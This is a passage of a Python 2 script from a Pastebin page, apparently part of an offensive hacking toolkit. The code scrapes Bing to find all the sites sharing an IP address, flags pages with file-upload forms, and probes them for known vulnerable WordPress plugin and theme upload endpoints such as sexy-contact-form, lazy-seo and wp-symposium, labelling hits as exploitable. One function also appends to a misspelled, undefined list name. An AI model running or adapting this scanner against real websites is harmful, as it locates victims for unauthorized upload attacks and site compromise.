  995. def grabsqli(ip):
  996. try :
  997. print bcolors.OKBLUE + "Check_Uplaod... "
  998. print '\n'
  999.  
  1000. page = 1
  1001. while page <= 21:
  1002. bing = "http://www.bing.com/search?q=ip%3A"+ip+"+upload&count=50&first="+str(page)
  1003. openbing = urllib2.urlopen(bing)
  1004. readbing = openbing.read()
  1005. findwebs = re.findall('<h2><a href="(.*?)"' , readbing)
  1006. sites = findwebs
  1007. for i in sites :
  1008. try :
  1009. response = urllib2.urlopen(i).read()
  1010. checksqli(i)
  1011. except urllib2.HTTPError, e:
  1012. str(sites).strip(i)
  1013.  
  1014. page = page + 10
  1015. except :
  1016. pass
  1017. def checksqli(sqli):
  1018. responsetwo = urllib2.urlopen(sqli).read()
  1019. find = re.findall('type="file"',responsetwo)
  1020. if find:
  1021. print(" Found ==> " + sqli)
  1022. def sqlscan():
  1023. ip = raw_input('Enter IP : ')
  1024. grabsqli(ip)
  1025. # found this code on stackoverflow.com/questions/19278877
  1026. def unique(seq):
  1027. seen = set()
  1028. return [seen.add(x) or x for x in seq if x not in seen]
  1029. def bing_all_grabber(s):
  1030. lista = []
  1031. page = 1
  1032. while page <= 101:
  1033. try:
  1034. bing = "http://www.bing.com/search?q=ip%3A" + s + "+&count=50&first=" + str(page)
  1035. openbing = urllib2.urlopen(bing)
  1036. readbing = openbing.read()
  1037. findwebs = re.findall('<h2><a href="(.*?)"', readbing)
  1038. for i in range(len(findwebs)):
  1039. allnoclean = findwebs[i]
  1040. findall1 = re.findall('http://(.*?)/', allnoclean)
  1041. for idx, item in enumerate(findall1):
  1042. if 'www' not in item:
  1043. findall1[idx] = 'http://www.' + item + '/'
  1044. else:
  1045. findall1[idx] = 'http://' + item + '/'
  1046. lista.extend(findall1)
  1047.  
  1048. page += 50
  1049. except urllib2.URLError:
  1050. pass
  1051.  
  1052. final = unique(lista)
  1053. return final
  1054. def check_wordpress(sites) :
  1055. wp = []
  1056. for site in sites :
  1057. try :
  1058. if urllib2.urlopen(site+'wp-login.php').getcode() == 200 :
  1059. wp.append(site)
  1060. except :
  1061. pass
  1062.  
  1063. return wp
  1064. def check_wpstorethemeremotefileupload(sites) :
  1065. wpstorethemeremotefileupload = []
  1066. for site in sites :
  1067. try :
  1068. if urllib2.urlopen(site+'wp-content/themes/WPStore/upload/index.php').getcode() == 200 :
  1069. wpstorethemeremotefileupload.append(site)
  1070. except :
  1071. pass
  1072.  
  1073. return wpstorethemeremotefileupload
  1074. def check_wpcontactcreativeform(sites) :
  1075. wpcontactcreativeform = []
  1076. for site in sites :
  1077. try :
  1078. if urllib2.urlopen(site+'wp-content/plugins/sexy-contact-form/includes/fileupload/index.php').getcode() == 200 :
  1079. wpcontactcreativeform.append(site)
  1080. except :
  1081. pass
  1082.  
  1083. return wpcontactcreativeform
  1084. def check_wplazyseoplugin(sites) :
  1085. wplazyseoplugin = []
  1086. for site in sites :
  1087. try :
  1088. if urllib2.urlopen(site+'wp-content/plugins/lazy-seo/lazyseo.php').getcode() == 200 :
  1089. wplazyseoplugin.append(site)
  1090. except :
  1091. pass
  1092.  
  1093. return wplazyseoplugin
  1094. def check_wpeasyupload(sites) :
  1095. wpeasyupload = []
  1096. for site in sites :
  1097. try :
  1098. if urllib2.urlopen(site+'wp-content/plugins/easy-comment-uploads/upload-form.php').getcode() == 200 :
  1099. wpeasyupload.append(site)
  1100. except :
  1101. pass
  1102.  
  1103. return wpeasyupload
  1104. def check_wpsymposium(sites) :
  1105. wpsymposium = []
  1106. for site in sites :
  1107. try :
  1108. if urllib2.urlopen(site+'wp-symposium/server/file_upload_form.php').getcode() == 200 :
  1109. wpsycmium.append(site)
  1110. except :
  1111. pass
  1112.  
  1113. return wpsymposium
  1114. def wpminiscanner():
  1115. ip = raw_input('Enter IP : ')
  1116. sites = bing_all_grabber(str(ip))
  1117. wordpress = check_wordpress(sites)
  1118. wpstorethemeremotefileupload = check_wpstorethemeremotefileupload(sites)
  1119. wpcontactcreativeform = check_wpcontactcreativeform(sites)
  1120. wplazyseoplugin = check_wplazyseoplugin(sites)
  1121. wpeasyupload = check_wpeasyupload(sites)
  1122. wpsymposium = check_wpsymposium(sites)
  1123. for ss in wordpress :
  1124. print ss
  1125. print '[*] Found, ', len(wordpress), ' wordpress sites.'
  1126. print '-'*30+'\n'
  1127. for ss in wpstorethemeremotefileupload :
  1128. print ss
  1129. print '[*] Found, ', len(wpstorethemeremotefileupload), ' wp_storethemeremotefileupload exploit.'
  1130. print '-'*30+'\n'
  1131. for ss in wpcontactcreativeform :
  1132. print ss
  1133. print '[*] Found, ', len(wpcontactcreativeform), ' wp_contactcreativeform exploit.'
  1134. print '-'*30+'\n'
  1135. for ss in wplazyseoplugin :
  1136. print ss
  1137. print '[*] Found, ', len(wplazyseoplugin), ' wp_lazyseoplugin exploit.'
  1138. print '-'*30+'\n'
  1139. for ss in wpeasyupload :
  1140. print ss
  1141. print '[*] Found, ', len(wpeasyupload), ' wp_easyupload exploit.'
  1142. print '-'*30+'\n'
  1143. for ss in wpsymposium :
  1144. print ss
  1145.  
  1146.  
  1147. print '[*] Found, ', len(wpsymposium), ' wp_sympsiup exploit.'
  1148.  
  1149. print '\n'
  1150. ############################
  1151. #begin :D
  1152. if __name__ == "__main__":
  1153. menu()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!